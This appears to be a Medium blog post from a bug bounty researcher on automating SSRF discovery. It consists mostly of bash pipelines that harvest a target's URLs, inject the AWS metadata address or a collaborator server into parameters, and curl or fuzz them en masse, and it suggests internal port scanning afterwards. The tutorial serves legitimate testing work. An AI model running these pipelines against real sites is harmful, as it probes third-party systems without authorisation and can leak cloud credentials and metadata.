Finding SSRF BY Full Automation

Hi, everyone

My name is Santosh Kumar Sha, I’m a security researcher from India(Assam). In this article, I will be describing how I was able to Find ssrf vulnerability by bu automating it and leak private information amazon metadata, ec2 and cloud services.

TIP For looking for SSRF bug with automation:

Tools Requried:

  1. gf (tomnomnom) — https://github.com/tomnomnom/gf
  2. qsreplace(tomnomnom) — https://github.com/tomnomnom/qsreplace
  3. ffuf — https://github.com/ffuf/ffuf
  4. gau(Corben) — https://github.com/lc/gau
  5. waybackurls(tomnomnom) — https://github.com/tomnomnom/waybackurls

Case#21 — — Accessing SSRF metadata with automation by just using curl and bash

Here get access to internal metadata by ssrf we will collect all URL from way-back machine and look for access the internal data by ssrf

Suppose the the target is targetme.com

Now here process the process for find the ssrf to access internal metadata

Command for getting the URL:

waybackurl targetme.com >> blindssrftesturl.txt

gau -subs targetme.com >> blindssrftesturl.txt

cat blindssrftesturl.txt | sort -u |anew | httpx | qsreplace ‘http://169.254.169.254/latest/meta-data/hostname’ | xargs -I % -P 25 sh -c ‘curl -ks “%” 2>&1 | grep ”compute.internal” && echo “SSRF VULN! %”’

ohhh….yeah………………………….

Case#2 — — Find Blind SSRF with automation by just using curl and bash

Now in order to look for blind ssrf we need to get all the URL for testing the blind ssrf we can get URL from way-back machine.

Suppose the the target is targetme.com

Now here process the process for find the Blind ssrf

Command for getting the URL:

waybackurl targetme.com >> blindssrftesturl.txt

gau -subs targetme.com >> blindssrftesturl.txt

After Getting all URLS we will sort all the URL and resolve it remove false positive:

cat blindssrftesturl.txt | sort -u |anew | httpx |tee -a prefinal_ssrftesturl.txt

Now we will used gf for extracting all URL which have parameter vulnerable for ssrf:

cat prefinal_ssrftesturl.txt | gf ssrf >> final_ssrftesturl.txt

Finally we will used FFUF and burp collabrator server or you can use pingb.in for automating it:

cat final_ssrftesturl.txt |qsreplace “Burp collaborator server” >> ssrf_auto-ffuf.txt

ffuf -c -w ssrf_auto-ffuf.txt -u FUZZ

Then check for any dns pingback hit you burp collaborator server.

IF you get any ping back and go for internal port scanning.

ohhh….yeah………………………….

Takeaway

I’m sure that a lot of security researcher had already see there process but this how I approach for find ssrf , and i have reported many in HackerOne using this process, .I hope this will help to find more ssrf

That’s one of the reasons why I wanted to share my experience. also to highlight other techniques to exploit such vulnerability.

Support me if you like my work! Buy me a coffee and Follow me on Twitter.

Thanks for reading :)
Stay Safe.

https://twitter.com/killmongar1996

--

--

--

Like to hack and break security code and denfense |Security Researcher |pentester | Bugbounty hunter | Pentration tester | CTF player | BUGBOUNTY

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Why Google and Facebook Should Update Oauth2: Workflow proposal

How to use WeDegen Telegram Sniper

{UPDATE} ABC Alphabet Phonics Letters Hack Free Resources Generator

Information Security & Governance with MxHero

Gravithon CTF 2021

Pen #003: The Hacker Methodology

Alfred Pennyworth and Barbara Gordon from Batman

The Weekly Threat 6–28–2022

Chinese Hacking Group APT 41 Stole Intellectual Property Worth Trillions From MNCs!

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Santosh Kumar Sha (@killmongar1996)

Santosh Kumar Sha (@killmongar1996)

Like to hack and break security code and denfense |Security Researcher |pentester | Bugbounty hunter | Pentration tester | CTF player | BUGBOUNTY

More from Medium

Parameter Pollution - Zero Day

Bug Bounty Recon: Fingerprinting

Fingerprinting Banner

A tale of 0-Click Account Takeover and 2FA Bypass.